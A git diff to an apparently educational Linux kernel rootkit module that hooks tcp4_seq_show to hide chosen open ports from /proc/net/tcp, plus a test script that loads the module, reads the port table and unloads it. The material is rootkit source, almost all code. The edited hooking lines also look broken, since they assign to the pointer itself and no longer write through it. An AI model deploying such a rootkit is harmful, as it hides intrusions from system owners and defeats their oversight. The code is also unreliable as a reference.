diff --git a/3_RootkitTechniques/3.6_hiding_ports/rootkit.c b/3_RootkitTechniques/3.6_hiding_ports/rootkit.c
index ab4eff6..70d1d98 100644
--- a/3_RootkitTechniques/3.6_hiding_ports/rootkit.c
+++ b/3_RootkitTechniques/3.6_hiding_ports/rootkit.c
@@ -14,14 +14,14 @@ MODULE_DESCRIPTION("Hiding open ports");
 MODULE_VERSION("0.01");
-unsigned long * __tcp4_seq_show;
+static unsigned long * __tcp4_seq_show;
 /* We have to save a copy of the tcp4_seq_show function the same way we save syscalls */
 typedef asmlinkage int (*orig_tcp4_seq_show_t)(struct net *);
 orig_tcp4_seq_show_t orig_tcp4_seq_show;
 /* This is our hook function for tcp4_seq_show */
-static int hook_tcp4_seq_show(struct seq_file *seq, void *v)
+asmlinkage int hook_tcp4_seq_show(struct seq_file *seq, void *v)
 {
 struct tcp_iter_state *st;
 struct sock *sk = v;
@@ -88,8 +88,8 @@ unprotect_memory();
 /* Set __tcp4_seq_show to our hook */
- printk(KERN_DEBUG "rootkit: hooking tcp4_seq_show with 0x%lx\n", hook_tcp4_seq_show);
- *__tcp4_seq_show = hook_tcp4_seq_show;
+ printk(KERN_DEBUG "rootkit: hooking tcp4_seq_show... (0x%lx)\n", hook_tcp4_seq_show);
+ __tcp4_seq_show = (unsigned long)hook_tcp4_seq_show;
 protect_memory();
@@ -101,9 +101,8 @@ unprotect_memory();
 /* Set __tcp4_seq_show back to the saved original function */
- printk(KERN_DEBUG "rootkit: restoring tcp4_seq_show with 0x%lx\n", orig_tcp4_seq_show);
- *__tcp4_seq_show = orig_tcp4_seq_show;
- printk(KERN_DEBUG "rootkit: found tcp4_seq_show at 0x%lx\n", __tcp4_seq_show);
+ printk(KERN_DEBUG "rootkit: restoring tcp4_seq_show... (0x%lx)\n", orig_tcp4_seq_show);
+ __tcp4_seq_show = (unsigned long)orig_tcp4_seq_show;
 protect_memory();
diff --git a/3_RootkitTechniques/3.6_hiding_ports/test.sh b/3_RootkitTechniques/3.6_hiding_ports/test.sh
index 66ab63b..6e97b95 100755
--- a/3_RootkitTechniques/3.6_hiding_ports/test.sh
+++ b/3_RootkitTechniques/3.6_hiding_ports/test.sh
@@ -6,6 +6,10 @@ sudo insmod rootkit.ko && +echo "" && +cat /proc/net/tcp && +echo "" && + sudo rmmod rootkit && dmesg